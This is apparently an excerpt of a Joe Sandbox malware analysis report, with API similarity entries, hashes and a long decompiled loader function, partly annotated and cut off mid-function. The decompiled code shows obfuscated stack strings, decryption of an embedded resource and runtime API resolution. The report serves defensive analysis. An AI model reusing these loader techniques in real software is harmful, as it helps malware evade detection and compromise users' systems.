• Instruction ID: 65d968a29d83eaca4270e95413268564572da6005fc1862e792aabb819076b41
• Opcode Fuzzy Hash: 450e9515a5d2da9de7335b60311a062e27d389d31a84452c9e5c6366e58add7e
• Instruction Fuzzy Hash: DB31C07181CB588FDB29DF98D8496F9BBE0EB65321F04816FD04ED3252CE74A845CB81
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph (graph image not reproduced): function 7ffbace61a1d-7ffbace61b09; block 7ffbace61a28-7ffbace61ad9 calls ControlService.

APIs
Memory Dump Source
• Source File: 00000004.00000002.284199442.00007FFBACE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACE60000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ffbace60000_buze36rj14.jbxd
Similarity
• API ID: ControlService
• String ID:
• API String ID: 253159669-0
• Opcode ID: 7eb08fe1f4f7d99076ddfac11926eeb214428b51e5ba676480471c614334723c
• Instruction ID: 36d4f5365ee7f00bce120c0241f158b80b2907b5a5c7166c43ba07860cc1a085
• Opcode Fuzzy Hash: 7eb08fe1f4f7d99076ddfac11926eeb214428b51e5ba676480471c614334723c
• Instruction Fuzzy Hash: E331C47191CB588FDB28DF9CD845AF97BE0EF65321F04016EE08AD3252CB74A806CB91
Uniqueness
Uniqueness Score: -1.00%

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 163 7ffbace6108a-7ffbace610b3 164 7ffbace610be-7ffbace61152 FindCloseChangeNotification 163->164 165 7ffbace610b5-7ffbace610bd 163->165 169 7ffbace6115a-7ffbace61181 164->169 170 7ffbace61154 164->170 165->164 170->169
APIs

Memory Dump Source

• Source File: 00000004.00000002.284199442.00007FFBACE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACE60000, based on PE: false

Joe Sandbox IDA Plugin

• Snapshot File: hcaresult_4_2_7ffbace60000_buze36rj14.jbxd

Similarity

• API ID: ChangeCloseFindNotification
• String ID:
• API String ID: 2591292051-0
• Opcode ID: 429bdfd87d7410929523c7fb335b930db48fc84aacc01f0fd3efbbac2ca02b12
• Instruction ID: f295a20e9874a9c3705481584360766b8b85277df0112a48fa14cfc89908b391
• Opcode Fuzzy Hash: 429bdfd87d7410929523c7fb335b930db48fc84aacc01f0fd3efbbac2ca02b12
• Instruction Fuzzy Hash: 4231087090CB8C4FDB4ADB68C8157E97FF0EF56321F04429FD089D31A2DA696856CB91

Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
APIs

Memory Dump Source

• Source File: 00000004.00000002.284199442.00007FFBACE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACE60000, based on PE: false

Joe Sandbox IDA Plugin

• Snapshot File: hcaresult_4_2_7ffbace60000_buze36rj14.jbxd

Similarity

• API ID: ImpersonateLoggedUser
• String ID:
• API String ID: 2216092060-0
• Opcode ID: 1a15b5bc89a9a98537dfeb3268ab531a9449fd29fd33178c3f4de7af4dc5c6e5
• Instruction ID: d15c777f5ee14e650b5bf6624de5f4d9dd4f5bd6614d3b00a50e26f6674e4bc9
• Opcode Fuzzy Hash: 1a15b5bc89a9a98537dfeb3268ab531a9449fd29fd33178c3f4de7af4dc5c6e5
• Instruction Fuzzy Hash: 5131D47190CA4C8FEB59DB68D845BF9BBE0EB66321F00422ED049D3192DB74A856CB91

Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
C-Code - Quality: 77%

E004019F0(void* __edx, void* __eflags) {
	void* __ebx;
	void* __edi;
	void* __esi;
	void* __ebp;
	void* _t337;
	void* _t340;
	int _t341;
	CHAR* _t344;
	intOrPtr* _t349;
	int _t350;
	long _t352;
	signed int _t354;
	intOrPtr _t358;
	long _t359;
	CHAR* _t364;
	struct HINSTANCE__* _t365;
	CHAR* _t366;
	_Unknown_base(*)()* _t367;
	int _t368;
	int _t369;
	int _t370;
	intOrPtr* _t376;
	int _t378;
	intOrPtr _t379;
	intOrPtr* _t381;
	int _t383;
	intOrPtr* _t384;
	int _t385;
	int _t396;
	int _t399;
	int _t402;
	int _t405;
	intOrPtr* _t407;
	int _t413;
	int _t415;
	void* _t421;
	int _t422;
	int _t424;
	intOrPtr* _t428;
	intOrPtr _t429;
	intOrPtr* _t431;
	int _t432;
	int _t435;
	intOrPtr* _t437;
	int _t438;
	intOrPtr* _t439;
	int _t440;
	int _t442;
	signed int _t448;
	signed int _t451;
	signed int _t452;
	int _t469;
	int _t471;
	int _t482;
	signed int _t486;
	intOrPtr* _t488;
	intOrPtr* _t490;
	intOrPtr* _t492;
	intOrPtr _t493;
	void* _t494;
	struct HRSRC__* _t497;
	void* _t514;
	int _t519;
	intOrPtr* _t520;
	void* _t524;
	void* _t525;
	struct HINSTANCE__* _t526;
	intOrPtr _t527;
	void* _t531;
	void* _t535;
	struct HRSRC__* _t536;
	intOrPtr* _t537;
	intOrPtr* _t539;
	int _t542;
	int _t543;
	intOrPtr* _t547;
	intOrPtr* _t548;
	intOrPtr* _t549;
	intOrPtr* _t550;
	void* _t551;
	intOrPtr _t552;
	int _t555;
	void* _t556;
	void* _t557;
	void* _t558;
	void* _t559;
	void* _t560;
	void* _t561;
	void* _t562;
	intOrPtr* _t563;
	void* _t564;
	void* _t565;
	void* _t566;
	void* _t567;

	_t567 = __eflags;
	_t494 = __edx;
	__imp__OleInitialize(0); // executed
	*((char*)(_t556 + 0x18)) = 0xe0;
	*((char*)(_t556 + 0x19)) = 0x3b;
                                                                                                                                                                                                    				 *((char*)(_t556 + 0x1a)) = 0x8d;
                                                                                                                                                                                                    				 *((char*)(_t556 + 0x1b)) = 0x2a;
                                                                                                                                                                                                    				 *((char*)(_t556 + 0x1c)) = 0xa2;
                                                                                                                                                                                                    				 *((char*)(_t556 + 0x1d)) = 0x2a;
                                                                                                                                                                                                    				 *((char*)(_t556 + 0x1e)) = 0x2a;
                                                                                                                                                                                                    				 *((char*)(_t556 + 0x1f)) = 0x41;
                                                                                                                                                                                                    				 *((char*)(_t556 + 0x20)) = 0xd3;
                                                                                                                                                                                                    				 *((char*)(_t556 + 0x21)) = 0x20;
                                                                                                                                                                                                    				 *((char*)(_t556 + 0x22)) = 0x64;
                                                                                                                                                                                                    				 *((char*)(_t556 + 0x23)) = 6;
                                                                                                                                                                                                    				 *((char*)(_t556 + 0x24)) = 0x8a;
                                                                                                                                                                                                    				 *((char*)(_t556 + 0x25)) = 0xf7;
                                                                                                                                                                                                    				 *((char*)(_t556 + 0x26)) = 0x3d;
                                                                                                                                                                                                    				 *((char*)(_t556 + 0x27)) = 0x9d;
                                                                                                                                                                                                    				 *((char*)(_t556 + 0x28)) = 0xd9;
                                                                                                                                                                                                    				 *((char*)(_t556 + 0x29)) = 0xee;
                                                                                                                                                                                                    				 *((char*)(_t556 + 0x2a)) = 0x15;
                                                                                                                                                                                                    				 *((char*)(_t556 + 0x2b)) = 0x68;
                                                                                                                                                                                                    				 *((char*)(_t556 + 0x2c)) = 0xf4;
                                                                                                                                                                                                    				 *((char*)(_t556 + 0x2d)) = 0x76;
                                                                                                                                                                                                    				 *((char*)(_t556 + 0x2e)) = 0xb9;
                                                                                                                                                                                                    				 *((char*)(_t556 + 0x2f)) = 0x34;
                                                                                                                                                                                                    				 *((char*)(_t556 + 0x30)) = 0xbf;
                                                                                                                                                                                                    				 *((char*)(_t556 + 0x31)) = 0x1e;
                                                                                                                                                                                                    				 *((char*)(_t556 + 0x32)) = 0xe7;
                                                                                                                                                                                                    				 *((char*)(_t556 + 0x33)) = 0x78;
                                                                                                                                                                                                    				 *((char*)(_t556 + 0x34)) = 0x98;
                                                                                                                                                                                                    				 *((char*)(_t556 + 0x35)) = 0xe9;
                                                                                                                                                                                                    				 *((char*)(_t556 + 0x36)) = 0x6f;
                                                                                                                                                                                                    				 *((char*)(_t556 + 0x37)) = 0xb4;
                                                                                                                                                                                                    				 *((char*)(_t556 + 0x38)) = 0;
                                                                                                                                                                                                    				_push(E00401650(_t556 + 0x14, _t556 + 0x114));
                                                                                                                                                                                                    				_t337 = E0040B99E(0, _t494, _t524, _t535, _t567);
                                                                                                                                                                                                    				_t557 = _t556 + 0xc;
                                                                                                                                                                                                    				if(_t337 == 0x41b2a0) {
                                                                                                                                                                                                    					L80:
                                                                                                                                                                                                    					__eflags = 0;
                                                                                                                                                                                                    					return 0;
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					_t340 = CreateToolhelp32Snapshot(8, GetCurrentProcessId()); // executed
                                                                                                                                                                                                    					_t525 = _t340;
                                                                                                                                                                                                    					 *((intOrPtr*)(_t557 + 0x280)) = 0x224;
                                                                                                                                                                                                    					 *((char*)(_t557 + 0x64)) = 0xce;
                                                                                                                                                                                                    					 *((char*)(_t557 + 0x65)) = 0x27;
                                                                                                                                                                                                    					 *((char*)(_t557 + 0x66)) = 0x9c;
                                                                                                                                                                                                    					 *((char*)(_t557 + 0x67)) = 0x1a;
                                                                                                                                                                                                    					 *((char*)(_t557 + 0x68)) = 0x95;
                                                                                                                                                                                                    					 *((char*)(_t557 + 0x69)) = 0x2e;
                                                                                                                                                                                                    					 *((char*)(_t557 + 0x6a)) = 0x22;
                                                                                                                                                                                                    					 *((char*)(_t557 + 0x6b)) = 0x57;
                                                                                                                                                                                                    					 *((char*)(_t557 + 0x6c)) = 0x91;
                                                                                                                                                                                                    					 *((char*)(_t557 + 0x6d)) = 0x21;
                                                                                                                                                                                                    					 *((char*)(_t557 + 0x6e)) = 0x57;
                                                                                                                                                                                                    					 *((char*)(_t557 + 0x6f)) = 0x3a;
                                                                                                                                                                                                    					 *((char*)(_t557 + 0x70)) = 0xf8;
                                                                                                                                                                                                    					 *((char*)(_t557 + 0x71)) = 0x98;
                                                                                                                                                                                                    					 *((char*)(_t557 + 0x72)) = 0x5b;
                                                                                                                                                                                                    					 *((char*)(_t557 + 0x73)) = 0xf4;
                                                                                                                                                                                                    					 *((char*)(_t557 + 0x74)) = 0xb5;
                                                                                                                                                                                                    					 *((char*)(_t557 + 0x75)) = 0x87;
                                                                                                                                                                                                    					 *((char*)(_t557 + 0x76)) = 0x7b;
                                                                                                                                                                                                    					 *((char*)(_t557 + 0x77)) = 0xf;
                                                                                                                                                                                                    					 *((char*)(_t557 + 0x78)) = 0xf4;
                                                                                                                                                                                                    					 *((char*)(_t557 + 0x79)) = 0x76;
                                                                                                                                                                                                    					 *((char*)(_t557 + 0x7a)) = 0xb9;
                                                                                                                                                                                                    					 *((char*)(_t557 + 0x7b)) = 0x34;
                                                                                                                                                                                                    					 *((char*)(_t557 + 0x7c)) = 0xbf;
                                                                                                                                                                                                    					 *((char*)(_t557 + 0x7d)) = 0x1e;
                                                                                                                                                                                                    					 *((char*)(_t557 + 0x7e)) = 0xe7;
                                                                                                                                                                                                    					 *((char*)(_t557 + 0x7f)) = 0x78;
                                                                                                                                                                                                    					 *((char*)(_t557 + 0x80)) = 0x98;
                                                                                                                                                                                                    					 *((char*)(_t557 + 0x81)) = 0xe9;
                                                                                                                                                                                                    					 *((char*)(_t557 + 0x82)) = 0x6f;
                                                                                                                                                                                                    					 *((char*)(_t557 + 0x83)) = 0xb4;
                                                                                                                                                                                                    					 *((char*)(_t557 + 0x84)) = 0;
                                                                                                                                                                                                    					 *((char*)(_t557 + 0x18)) = 0xc0;
                                                                                                                                                                                                    					 *((char*)(_t557 + 0x19)) = 0x38;
                                                                                                                                                                                                    					 *((char*)(_t557 + 0x1a)) = 0x8d;
                                                                                                                                                                                                    					 *((char*)(_t557 + 0x1b)) = 0x1f;
                                                                                                                                                                                                    					 *((char*)(_t557 + 0x1c)) = 0x8e;
                                                                                                                                                                                                    					 *((char*)(_t557 + 0x1d)) = 0x30;
                                                                                                                                                                                                    					 *((char*)(_t557 + 0x1e)) = 0x65;
                                                                                                                                                                                                    					 *((char*)(_t557 + 0x1f)) = 0x47;
                                                                                                                                                                                                    					 *((char*)(_t557 + 0x20)) = 0xd3;
                                                                                                                                                                                                    					 *((char*)(_t557 + 0x21)) = 0x29;
                                                                                                                                                                                                    					 *((char*)(_t557 + 0x22)) = 0x3b;
                                                                                                                                                                                                    					 *((char*)(_t557 + 0x23)) = 0x56;
                                                                                                                                                                                                    					 *((char*)(_t557 + 0x24)) = 0xf8;
                                                                                                                                                                                                    					 *((char*)(_t557 + 0x25)) = 0x98;
                                                                                                                                                                                                    					 *((char*)(_t557 + 0x26)) = 0x5b;
                                                                                                                                                                                                    					 *((char*)(_t557 + 0x27)) = 0xf4;
                                                                                                                                                                                                    					 *((char*)(_t557 + 0x28)) = 0xb5;
                                                                                                                                                                                                    					 *((char*)(_t557 + 0x29)) = 0x87;
                                                                                                                                                                                                    					 *((char*)(_t557 + 0x2a)) = 0x7b;
                                                                                                                                                                                                    					 *((char*)(_t557 + 0x2b)) = 0xf;
                                                                                                                                                                                                    					 *((char*)(_t557 + 0x2c)) = 0xf4;
                                                                                                                                                                                                    					 *((char*)(_t557 + 0x2d)) = 0x76;
                                                                                                                                                                                                    					 *((char*)(_t557 + 0x2e)) = 0xb9;
                                                                                                                                                                                                    					 *((char*)(_t557 + 0x2f)) = 0x34;
                                                                                                                                                                                                    					 *((char*)(_t557 + 0x30)) = 0xbf;
                                                                                                                                                                                                    					 *((char*)(_t557 + 0x31)) = 0x1e;
                                                                                                                                                                                                    					 *((char*)(_t557 + 0x32)) = 0xe7;
                                                                                                                                                                                                    					 *((char*)(_t557 + 0x33)) = 0x78;
                                                                                                                                                                                                    					 *((char*)(_t557 + 0x34)) = 0x98;
                                                                                                                                                                                                    					 *((char*)(_t557 + 0x35)) = 0xe9;
                                                                                                                                                                                                    					 *((char*)(_t557 + 0x36)) = 0x6f;
                                                                                                                                                                                                    					 *((char*)(_t557 + 0x37)) = 0xb4;
                                                                                                                                                                                                    					 *((char*)(_t557 + 0x38)) = 0;
                                                                                                                                                                                                    					_t341 = Module32First(_t525, _t557 + 0x278); // executed
                                                                                                                                                                                                    					if(_t341 == 0) {
                                                                                                                                                                                                    						L38:
                                                                                                                                                                                                    						FindCloseChangeNotification(_t525); // executed
                                                                                                                                                                                                    						_t526 = GetModuleHandleA(0);
                                                                                                                                                                                                    						 *((char*)(_t557 + 0x1c)) = 0xfc;
                                                                                                                                                                                                    						 *((char*)(_t557 + 0x1d)) = 0xb;
                                                                                                                                                                                                    						 *((char*)(_t557 + 0x1e)) = 0xff;
                                                                                                                                                                                                    						 *((char*)(_t557 + 0x1f)) = 0x75;
                                                                                                                                                                                                    						 *((char*)(_t557 + 0x20)) = 0xe7;
                                                                                                                                                                                                    						 *((char*)(_t557 + 0x21)) = 0x44;
                                                                                                                                                                                                    						 *((char*)(_t557 + 0x22)) = 0x4b;
                                                                                                                                                                                                    						 *((char*)(_t557 + 0x23)) = 0x23;
                                                                                                                                                                                                    						 *((char*)(_t557 + 0x24)) = 0xbf;
                                                                                                                                                                                                    						 *((char*)(_t557 + 0x25)) = 0x45;
                                                                                                                                                                                                    						 *((char*)(_t557 + 0x26)) = 0x3b;
                                                                                                                                                                                                    						 *((char*)(_t557 + 0x27)) = 0x56;
                                                                                                                                                                                                    						 *((char*)(_t557 + 0x28)) = 0xf8;
                                                                                                                                                                                                    						 *((char*)(_t557 + 0x29)) = 0x98;
                                                                                                                                                                                                    						 *((char*)(_t557 + 0x2a)) = 0x5b;
                                                                                                                                                                                                    						 *((char*)(_t557 + 0x2b)) = 0xf4;
                                                                                                                                                                                                    						 *((char*)(_t557 + 0x2c)) = 0xb5;
                                                                                                                                                                                                    						 *((char*)(_t557 + 0x2d)) = 0x87;
                                                                                                                                                                                                    						 *((char*)(_t557 + 0x2e)) = 0x7b;
                                                                                                                                                                                                    						 *((char*)(_t557 + 0x2f)) = 0xf;
                                                                                                                                                                                                    						 *((char*)(_t557 + 0x30)) = 0xf4;
                                                                                                                                                                                                    						 *((char*)(_t557 + 0x31)) = 0x76;
                                                                                                                                                                                                    						 *((char*)(_t557 + 0x32)) = 0xb9;
                                                                                                                                                                                                    						 *((char*)(_t557 + 0x33)) = 0x34;
                                                                                                                                                                                                    						 *((char*)(_t557 + 0x34)) = 0xbf;
                                                                                                                                                                                                    						 *((char*)(_t557 + 0x35)) = 0x1e;
                                                                                                                                                                                                    						 *((char*)(_t557 + 0x36)) = 0xe7;
                                                                                                                                                                                                    						 *((char*)(_t557 + 0x37)) = 0x78;
                                                                                                                                                                                                    						 *((char*)(_t557 + 0x38)) = 0x98;
                                                                                                                                                                                                    						 *((char*)(_t557 + 0x39)) = 0xe9;
                                                                                                                                                                                                    						 *((char*)(_t557 + 0x3a)) = 0x6f;
                                                                                                                                                                                                    						 *((char*)(_t557 + 0x3b)) = 0xb4;
                                                                                                                                                                                                    						 *((char*)(_t557 + 0x3c)) = 0;
                                                                                                                                                                                                    						_t344 = E00401650(_t557 + 0x18, _t557 + 0x158);
                                                                                                                                                                                                    						_t558 = _t557 + 8;
                                                                                                                                                                                                    						_t536 = FindResourceA(_t526, _t344, 0xa);
                                                                                                                                                                                                    						 *(_t558 + 0x50) = _t536;
                                                                                                                                                                                                    						_t551 = LoadResource(_t526, _t536);
                                                                                                                                                                                                    						 *((intOrPtr*)(_t558 + 0x44)) = LockResource(_t551);
                                                                                                                                                                                                    						_t349 = E0040B84D(0, _t557 + 0x18, _t526, SizeofResource(_t526, _t536)); // executed
                                                                                                                                                                                                    						_push(0x40022);
                                                                                                                                                                                                    						_t537 = _t349; // executed
                                                                                                                                                                                                    						_t350 = E0040AF66(0, _t526, __eflags); // executed
                                                                                                                                                                                                    						_t559 = _t558 + 8;
                                                                                                                                                                                                    						 *(_t559 + 0x34) = _t350;
                                                                                                                                                                                                    						__eflags = _t350;
                                                                                                                                                                                                    						if(_t350 == 0) {
                                                                                                                                                                                                    							 *(_t559 + 0x50) = 0;
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							E0040BA30(_t526, _t350, 0, 0x40022);
                                                                                                                                                                                                    							_t486 =  *(_t559 + 0x40);
                                                                                                                                                                                                    							_t559 = _t559 + 0xc;
                                                                                                                                                                                                    							 *(_t559 + 0x50) = _t486;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						E00401300( *(_t559 + 0x50));
                                                                                                                                                                                                    						_t497 =  *(_t559 + 0x48);
                                                                                                                                                                                                    						_t352 = SizeofResource(_t526, _t497);
                                                                                                                                                                                                    						 *(_t559 + 0x40) = _t352;
                                                                                                                                                                                                    						asm("cdq");
                                                                                                                                                                                                    						_t354 = _t352 + (_t497 & 0x000003ff) >> 0xa;
                                                                                                                                                                                                    						__eflags = _t354;
                                                                                                                                                                                                    						if(_t354 > 0) {
                                                                                                                                                                                                    							_t519 =  *(_t559 + 0x3c);
                                                                                                                                                                                                    							_t482 = _t537 - _t519;
                                                                                                                                                                                                    							__eflags = _t482;
                                                                                                                                                                                                    							 *(_t559 + 0x34) = _t519;
                                                                                                                                                                                                    							 *(_t559 + 0x88) = _t482;
                                                                                                                                                                                                    							 *(_t559 + 0x38) = _t354;
                                                                                                                                                                                                    							do {
                                                                                                                                                                                                    								_t424 =  *(_t559 + 0x34);
                                                                                                                                                                                                    								_push( *(_t559 + 0x88) + _t424);
                                                                                                                                                                                                    								_push(0x400);
                                                                                                                                                                                                    								_push(_t424);
                                                                                                                                                                                                    								E00401560(0,  *((intOrPtr*)(_t559 + 0x54)));
                                                                                                                                                                                                    								 *(_t559 + 0x34) =  *(_t559 + 0x34) + 0x400;
                                                                                                                                                                                                    								_t179 = _t559 + 0x38;
                                                                                                                                                                                                    								 *_t179 =  *(_t559 + 0x38) - 1;
                                                                                                                                                                                                    								__eflags =  *_t179;
                                                                                                                                                                                                    							} while ( *_t179 != 0);
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t448 =  *(_t559 + 0x40) & 0x800003ff;
                                                                                                                                                                                                    						__eflags = _t448;
                                                                                                                                                                                                    						if(_t448 < 0) {
                                                                                                                                                                                                    							_t448 = (_t448 - 0x00000001 | 0xfffffc00) + 1;
                                                                                                                                                                                                    							__eflags = _t448;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						__eflags = _t448;
                                                                                                                                                                                                    						if(_t448 > 0) {
                                                                                                                                                                                                    							_t421 =  *(_t559 + 0x40) - _t448;
                                                                                                                                                                                                    							_push(_t421 + _t537);
                                                                                                                                                                                                    							_push(_t448);
                                                                                                                                                                                                    							_t422 = _t421 +  *((intOrPtr*)(_t559 + 0x44));
                                                                                                                                                                                                    							__eflags = _t422;
                                                                                                                                                                                                    							_push(_t422);
                                                                                                                                                                                                    							E00401560(0,  *((intOrPtr*)(_t559 + 0x58)));
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						E0040BA30(_t526,  *(_t559 + 0x3c), 0,  *(_t559 + 0x40));
                                                                                                                                                                                                    						_t560 = _t559 + 0xc;
                                                                                                                                                                                                    						FreeResource(_t551);
                                                                                                                                                                                                    						_t552 =  *_t537;
                                                                                                                                                                                                    						 *((intOrPtr*)(_t560 + 0x94)) = _t552;
                                                                                                                                                                                                    						_t358 = E0040B84D(0,  *(_t559 + 0x40), _t526, _t552); // executed
                                                                                                                                                                                                    						_t561 = _t560 + 4;
                                                                                                                                                                                                    						 *((intOrPtr*)(_t561 + 0x40)) = _t358;
                                                                                                                                                                                                    						_t359 = SizeofResource(_t526,  *(_t560 + 0x4c));
                                                                                                                                                                                                    						_t527 =  *((intOrPtr*)(_t561 + 0x38));
                                                                                                                                                                                                    						_t192 = _t537 + 4; // 0x4
                                                                                                                                                                                                    						E0040AC60(_t527, _t561 + 0x98, _t192, _t359);
                                                                                                                                                                                                    						E0040BA30(_t527, _t537, 0,  *((intOrPtr*)(_t561 + 0x50)));
                                                                                                                                                                                                    						_t528 = _t527 + 0xe;
                                                                                                                                                                                                    						 *((char*)(_t561 + 0x34)) = 0xce;
                                                                                                                                                                                                    						 *((char*)(_t561 + 0x35)) = 0x27;
                                                                                                                                                                                                    						 *((char*)(_t561 + 0x36)) = 0x9c;
                                                                                                                                                                                                    						 *((char*)(_t561 + 0x37)) = 0x1a;
                                                                                                                                                                                                    						 *((char*)(_t561 + 0x38)) = 0x95;
                                                                                                                                                                                                    						 *((char*)(_t561 + 0x39)) = 0x21;
                                                                                                                                                                                                    						 *((char*)(_t561 + 0x3a)) = 0x2e;
                                                                                                                                                                                                    						 *((char*)(_t561 + 0x3b)) = 0xd;
                                                                                                                                                                                                    						 *((char*)(_t561 + 0x3c)) = 0xdb;
                                                                                                                                                                                                    						 *((char*)(_t561 + 0x3d)) = 0x29;
                                                                                                                                                                                                    						 *((char*)(_t561 + 0x3e)) = 0x57;
                                                                                                                                                                                                    						 *((char*)(_t561 + 0x3f)) = 0x56;
                                                                                                                                                                                                    						 *((char*)(_t561 + 0x40)) = 0xf8;
                                                                                                                                                                                                    						 *((char*)(_t561 + 0x41)) = 0x98;
                                                                                                                                                                                                    						 *((char*)(_t561 + 0x42)) = 0x5b;
                                                                                                                                                                                                    						 *((char*)(_t561 + 0x43)) = 0xf4;
                                                                                                                                                                                                    						 *((char*)(_t561 + 0x44)) = 0xb5;
                                                                                                                                                                                                    						 *((char*)(_t561 + 0x45)) = 0x87;
                                                                                                                                                                                                    						 *((char*)(_t561 + 0x46)) = 0x7b;
                                                                                                                                                                                                    						 *((char*)(_t561 + 0x47)) = 0xf;
                                                                                                                                                                                                    						 *((char*)(_t561 + 0x48)) = 0xf4;
                                                                                                                                                                                                    						 *((char*)(_t561 + 0x49)) = 0x76;
                                                                                                                                                                                                    						 *((char*)(_t561 + 0x4a)) = 0xb9;
                                                                                                                                                                                                    						 *((char*)(_t561 + 0x4b)) = 0x34;
                                                                                                                                                                                                    						 *((char*)(_t561 + 0x4c)) = 0xbf;
                                                                                                                                                                                                    						 *((char*)(_t561 + 0x4d)) = 0x1e;
                                                                                                                                                                                                    						 *((char*)(_t561 + 0x4e)) = 0xe7;
                                                                                                                                                                                                    						 *((char*)(_t561 + 0x4f)) = 0x78;
                                                                                                                                                                                                    						 *((char*)(_t561 + 0x50)) = 0x98;
                                                                                                                                                                                                    						 *((char*)(_t561 + 0x51)) = 0xe9;
                                                                                                                                                                                                    						 *((char*)(_t561 + 0x52)) = 0x6f;
                                                                                                                                                                                                    						 *((char*)(_t561 + 0x53)) = 0xb4;
                                                                                                                                                                                                    						 *((char*)(_t561 + 0x54)) = 0;
                                                                                                                                                                                                    						_t364 = E00401650(_t561 + 0x30, _t561 + 0x110);
						// Annotation (editor, not part of the sandbox output): the block below resolves an export at run time,
						// obtains a COM-style object through pointers to static GUID data (0x41b210, 0x41b220, 0x41b230, 0x41b240,
						// 0x41b270, 0x41b290), and marshals a byte buffer into a SAFEARRAY before calling further vtable slots.
						// Matching those GUIDs against known CLSIDs/IIDs is how an analyst would name the interfaces involved.
						_t562 = _t561 + 0x24;
						_t365 = LoadLibraryA(_t364); // executed
						_t538 = _t365;
						// Byte string assembled on the stack one byte at a time (stack-string construction).
						 *((char*)(_t562 + 0x10)) = 0xe0;
						 *((char*)(_t562 + 0x11)) = 0x18;
						 *((char*)(_t562 + 0x12)) = 0xad;
						 *((char*)(_t562 + 0x13)) = 0x36;
						 *((char*)(_t562 + 0x14)) = 0x95;
						 *((char*)(_t562 + 0x15)) = 0x21;
						_t451 = _t562 + 0x134;
						 *((char*)(_t562 + 0x1e)) = 0x2a;
						 *((char*)(_t562 + 0x1f)) = 0x57;
						 *((char*)(_t562 + 0x20)) = 0xda;
						 *((char*)(_t562 + 0x21)) = 0xc;
						 *((char*)(_t562 + 0x22)) = 0x55;
						 *((char*)(_t562 + 0x23)) = 0x25;
						 *((char*)(_t562 + 0x24)) = 0x8c;
						 *((char*)(_t562 + 0x25)) = 0xf9;
						 *((char*)(_t562 + 0x26)) = 0x35;
						 *((char*)(_t562 + 0x27)) = 0x97;
						 *((char*)(_t562 + 0x28)) = 0xd0;
						 *((char*)(_t562 + 0x29)) = 0x87;
						 *((char*)(_t562 + 0x2a)) = 0x7b;
						 *((char*)(_t562 + 0x2b)) = 0xf;
						 *((char*)(_t562 + 0x2c)) = 0xf4;
						 *((char*)(_t562 + 0x2d)) = 0x76;
						 *((char*)(_t562 + 0x2e)) = 0xb9;
						 *((char*)(_t562 + 0x2f)) = 0x34;
						 *((char*)(_t562 + 0x30)) = 0xbf;
						 *((char*)(_t562 + 0x31)) = 0x1e;
						 *((char*)(_t562 + 0x32)) = 0xe7;
						 *((char*)(_t562 + 0x33)) = 0x78;
						 *((char*)(_t562 + 0x34)) = 0x98;
						 *((char*)(_t562 + 0x35)) = 0xe9;
						 *((char*)(_t562 + 0x36)) = 0x6f;
						 *((char*)(_t562 + 0x37)) = 0xb4;
						 *((char*)(_t562 + 0x38)) = 0;
						// The stack string is passed through E00401650 before GetProcAddress; the export name is therefore
						// not stored in plaintext (assumption: E00401650 decodes it; its body is not in this excerpt).
						_t366 = E00401650(_t562 + 0x14, _t451);
						_t563 = _t562 + 8;
						_t367 = GetProcAddress(_t365, _t366);
						__eflags = _t367;
						_t452 = _t451 & 0xffffff00 | _t367 != 0x00000000;
						__eflags = _t452;
						 *(_t563 + 0x47) = _t452 == 0;
						 *0x423480 = _t367; // resolved function pointer cached in a global
						 *((intOrPtr*)(_t563 + 0x80)) = 0;
						 *((intOrPtr*)(_t563 + 0x84)) = 0;
						 *((intOrPtr*)(_t563 + 0x4c)) = 0;
						 *(_t563 + 0x58) = 0;
						 *(_t563 + 0x54) = 0;
						__eflags = _t452;
						if(_t452 != 0) {
							// Call through the resolved pointer: two static GUID pointers and an out-pointer for the interface.
							_t368 =  *_t367(0x41b230, 0x41b220, _t563 + 0x80); // executed
							__eflags = _t368;
							if(_t368 >= 0) { // HRESULT-style success check
								__eflags =  *(_t563 + 0x47);
								if( *(_t563 + 0x47) == 0) {
									 *((intOrPtr*)(_t563 + 0x17c)) = _t563 + 0x17c;
									E004018F0( *((intOrPtr*)(_t563 + 0x38)), _t563 + 0x17c, _t563 + 0x17c,  *((intOrPtr*)(_t563 + 0x38)), 3);
									// Chained vtable calls (slots +0xc, +0x24, +0x28); each returned object is the next call's receiver.
									_t376 =  *((intOrPtr*)(_t563 + 0x80));
									_t378 =  *((intOrPtr*)( *((intOrPtr*)( *_t376 + 0xc))))(_t376,  *((intOrPtr*)(_t563 + 0x178)), 0x41b240, _t563 + 0x84); // executed
									__eflags = _t378;
									if(_t378 >= 0) {
										_t381 =  *((intOrPtr*)(_t563 + 0x84));
										_t383 =  *((intOrPtr*)( *((intOrPtr*)( *_t381 + 0x24))))(_t381, 0x41b210, 0x41b290, _t563 + 0x4c); // executed
										__eflags = _t383;
										if(_t383 >= 0) {
											_t384 =  *((intOrPtr*)(_t563 + 0x4c));
											_t385 =  *((intOrPtr*)( *((intOrPtr*)( *_t384 + 0x28))))(_t384); // executed
											__eflags = _t385;
											if(_t385 >= 0) {
												 *((intOrPtr*)(_t563 + 0x38)) = 0;
												E00401870(_t563 + 0x44, _t552, "_._");
												_t539 = __imp__#8; // ordinal import (oleaut32 #8 is VariantInit; the module is not named in this excerpt)
												 *((intOrPtr*)(_t563 + 0x40)) = 0;
												 *_t539(_t563 + 0x94);
												E00401870(_t563 + 0x3c, _t552, "___");
												 *_t539(_t563 + 0xa4);
												 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t563 + 0x4c)))) + 0x34))))( *((intOrPtr*)(_t563 + 0x50)), E004018D0(_t563 + 0x58)); // executed
												_t542 =  *(_t563 + 0x58);
												__eflags = _t542;
												if(_t542 == 0) {
													E0040AD90(0x80004003); // E_POINTER error path
												}
